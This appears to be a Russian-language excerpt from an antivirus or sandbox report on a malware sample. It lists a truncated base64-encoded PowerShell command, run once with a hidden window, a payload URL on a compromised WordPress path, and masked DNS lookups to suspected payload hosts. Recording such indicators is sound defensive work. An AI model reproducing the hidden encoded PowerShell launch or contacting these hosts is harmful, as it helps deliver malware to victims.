Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAASwBzAHkAZwB3AGoAawB5AGcAbgBoACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAEkAcgBqAGEAdgB5AHEAcQBpAGQAIAAjAD4AIAAkAFgAYQB2AGMAZABtAHcAdwBtAHEAPQAnAEoAdAB1A...
- http://de#.##rivella.es/wp-admin/KXMpiT/
- DNS ASK qu######m.000webhostapp.com
- DNS ASK in######on.cense.iisc.ac.in
- DNS ASK te##.#noopam.org
- DNS ASK de#.##rivella.es
- DNS ASK an#####.000webhostapp.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAASwBzAHkAZwB3AGoAawB5AGcAbgBoACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAEkAcgBqAGEAdgB5AHEAcQBpAGQAIAAjAD4AIAAkAFgAYQB2AGMAZABtAHcAdwBtAHEAPQAnAEoAdAB1A...' (со скрытым окном)